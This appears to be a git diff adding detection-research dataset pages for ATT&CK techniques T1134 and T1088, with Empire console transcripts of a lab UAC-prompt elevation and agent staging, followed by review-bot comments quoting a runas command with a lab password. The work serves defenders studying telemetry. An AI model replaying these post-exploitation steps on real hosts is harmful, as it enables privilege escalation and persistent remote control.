*SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 20:43:51 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 20:43:54 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 20:43:52 https + +(Empire: agents) > +``` \ No newline at end of file 
diff --git a/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.tar.gz b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.tar.gz new file mode 100644 index 00000000..c9486876 Binary files /dev/null and b/small_datasets/windows/privilege_escalation/access_token_manipulation_T1134/empire_invoke_runas.tar.gz differ diff --git a/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/README.md b/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/README.md new file mode 100644 index 00000000..da381dad --- /dev/null +++ b/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/README.md @@ -0,0 +1,9 @@ +# Bypass User Account Control + +Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_ask](./empire_ask.md) | 2019-05-18183600 | \ No newline at end of file diff --git a/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/empire_ask.md b/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/empire_ask.md new file mode 100644 index 00000000..44c68fbe --- /dev/null +++ b/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/empire_ask.md 
@@ -0,0 +1,133 @@ +# Empire Ask + +Leverages Start-Process' -Verb runAs option inside a YES-Required loop to prompt the user for a high integrity context before running the agent code. +UAC will report Powershell is requesting Administrator privileges. Because this does not use the BypassUAC DLLs, it should not trigger any AV alerts. + +## Technique(s) ID + +T1088 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_ask.tar.gz](./empire_ask.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18183600 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 214 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 14 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 82 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 79 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 48 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 14 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 9 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 4 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 4 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 4 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Removable 
Storage | 3 | +| Security | Microsoft-Windows-Security-Auditing | Security System Extension | 2 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 475 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 455 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 237 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 75 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 27 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 22 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 192 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## 
Attacker Activity + +``` +(Empire: H3DKB8SA) > usemodule privesc/ask +(Empire: powershell/privesc/ask) > info + + Name: Invoke-Ask + Module: powershell/privesc/ask + NeedsAdmin: False + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + Jack64 + +Description: + Leverages Start-Process' -Verb runAs option inside a YES- + Required loop to prompt the user for a high integrity + context before running the agent code. UAC will report + Powershell is requesting Administrator privileges. Because + this does not use the BypassUAC DLLs, it should not trigger + any AV alerts. + +Comments: + https://github.com/rapid7/metasploit- + framework/blob/master/modules/exploits/windows/local/ask.rb + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to use. + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Proxy False default Proxy to use for request (default, none, + or other). + Agent True H3DKB8SA Agent to run module on. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + +(Empire: powershell/privesc/ask) > set Listener https +(Empire: powershell/privesc/ask) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked H3DKB8SA to run TASK_CMD_JOB +[*] Agent H3DKB8SA tasked with task ID 2 +[*] Tasked agent H3DKB8SA to run module powershell/privesc/ask +(Empire: powershell/privesc/ask) > Job started: PDY4F2 +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent TKV35P8X checked in +[+] Initial agent TKV35P8X from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to TKV35P8X at 10.0.10.103 +[*] Successfully elevated! 
+ + +(Empire: powershell/privesc/ask) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 18:37:11 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 18:37:10 https + +(Empire: agents) > +```
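Review bot: In empire_elevated_wmi.md the `## Time Taken` value `2019-05-18184306` runs the date and the time together with no separator, which is ambiguous to read and awkward to sort or parse; an ISO-8601 form such as `2019-05-18T18:43:06` (with a timezone if known) would be clearer, and the same form would suit the `Updated` columns of the README tables. In the `## About this file` table the last column is headed `record_number` but holds the number of records per task (for example `Process accessed (rule: ProcessAccess) | 1678`), so `record_count` or `count` would describe it accurately. The three Sysmon rows `WmiEventFilter`, `WmiEventConsumer` and `WmiEventConsumerToFilter activity detected (rule: WmiEvent)`, one record each, are the direct artifacts of the subscription this dataset was built to capture, and the module's `SubName` option shows it was created under the default name `Updater`; a short note under the dataset description giving that name and pointing at those three events would tell analysts exactly what to look for in the archive.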
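Review bot: In the access_token_manipulation_T1134 README the technique paragraph is the ATT&CK description of T1134 but carries no attribution or link; a reference line to the source would make the origin of the wording clear. The variations table is also inconsistent with the dataset page it links to: `| shire | [empire_invoke_runas](./empire_invoke_runas.md) | 2019-05-18204300 |` uses lowercase `shire` where empire_invoke_runas.md gives the network environment as `Shire`, and the `Updated` value would read and sort better as an ISO-8601 timestamp (`2019-05-18T20:43:00`).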
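Review bot: In empire_invoke_runas.md the `## Attacker Activity` block imports and runs a script the page never documents: `scriptimport /tmp/invoke-runas-cmd.ps1` followed by `scriptcmd Invoke-RunAs -username pgustavo ... -Cmd cmd.exe -Arguments "/c C:\windows\system32\autoupdate.vbs"`. A reader cannot tell where `Invoke-RunAs` comes from or what `autoupdate.vbs` is, even though a new agent `V6W3TH8Y` checks in as `SHIRE\pgustavo` immediately afterwards, so the page should state the script's origin and how the .vbs came to be on HR001; without that, the file, process and logon events in the archive cannot be tied back to the actions that produced them. The opening sentence `Adversaries can execute a stager with explicit credentials runas style.` also reads awkwardly; `Adversaries can execute a stager runas-style, with explicit credentials.` is clearer. Worth flagging too that the `pgustavo` lab password is committed in clear text in the command line; a note that it is a disposable lab credential avoids confusion if the account is reused across datasets.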
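Review bot: In the bypass_user_account_control_T1088 README the description paragraph is the ATT&CK T1088 wording without a citation; add a reference to the source. The table row `| shire | [empire_ask](./empire_ask.md) | 2019-05-18183600 |` uses lowercase `shire` while empire_ask.md gives the network environment as `Shire`, and the `Updated` column would be easier to read and sort as an ISO-8601 timestamp (`2019-05-18T18:36:00`); normalising both keeps the index consistent with the dataset pages.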
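Review bot: In empire_ask.md the page's own summary repeats the module's claim verbatim (`Because this does not use the BypassUAC DLLs, it should not trigger any AV alerts.`) as though it were a finding of this dataset; since the archive records host telemetry rather than AV results, either attribute that sentence to the Empire module description or leave it only in the quoted `info` output. The `[*] Successfully elevated!` line also depends on a user having accepted the UAC consent prompt on HR001 (the module loops until the prompt is answered Yes), and the page does not say who accepted it or how many prompts were shown; recording that would help readers interpret the `Process Creation | 9` and `Process Create (rule: ProcessCreate) | 9` rows in the table. Finally, in the agents listing `TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452` the `*` prefix is Empire's marker for a high-integrity agent; a one-line explanation of that marker would help readers unfamiliar with Empire output see that the elevation is visible in the listing.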